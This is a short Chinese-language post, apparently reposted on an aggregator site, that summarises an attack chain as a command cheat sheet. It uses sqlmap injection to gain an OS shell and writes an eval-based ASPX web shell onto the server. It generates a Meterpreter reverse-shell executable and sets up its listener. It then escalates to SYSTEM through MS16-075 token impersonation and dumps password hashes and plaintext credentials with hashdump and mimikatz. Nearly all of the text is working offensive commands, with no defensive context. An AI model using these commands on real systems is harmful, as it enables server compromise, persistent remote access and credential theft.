sqlmap注入及ms16-075提权总结

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap注入及ms16-075提权总结相关的知识,希望对你有一定的参考价值。

sqlmap注入及ms16-075提权总结

(1)sqlmap执行命令

sqlmap.py -r 1**.***.***.***.txt

sqlmap.py -r 1**.***.***.***.txt --is-db

sqlmap.py -r 1**.***.***.***.txt --password --batch

sqlmap.py -r 1**.***.***.***.txt --os-shell

(2)os-shell下执行命令

ipconfig

dir c:/

echo "thisis test">e:\software\AMS_NoFlow\t.txt

echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > e:\software\AMS_NoFlow\cmd.aspx

(3)msf下执行命令

生成反弹×××:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=4433 -f exe -o 4433.exe

(4)msf启动及监听

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.1.33(实际为外网IP地址)

set LPORT 4433

exploit  

(5)ms16-075提权命令

use incognito

list_tokens -u

execute -cH -f ./potato.exe

list_tokens -u 

impersonate_token "NT AUTHORITY\\SYSTEM"

getuid

(6)获取密码

run hashdump

(7)mimikatz进行密码获取

load mimikatz

kerberos、livessp、msv、ssp、tspkg、wdigest(逐个命令测试,有的会显示明文密码)

mimikatz_command:mimikatz命令提示窗口

(8)mimikatz命令行下获取密码(未做测试)

privilege::debug

sekurlsa::logonpasswords


以上是关于sqlmap注入及ms16-075提权总结的主要内容,如果未能解决你的问题,请参考以下文章

SQLmap注入获取Webshell及系统权限研究

Sqlmap使用及提权

实战ms16-075提权Windows Server 2012

烂土豆提权(MS16-075)--令牌窃取提权

烂土豆提权(MS16-075)--令牌窃取提权

sqlmap可以从第一万条开始脱裤吗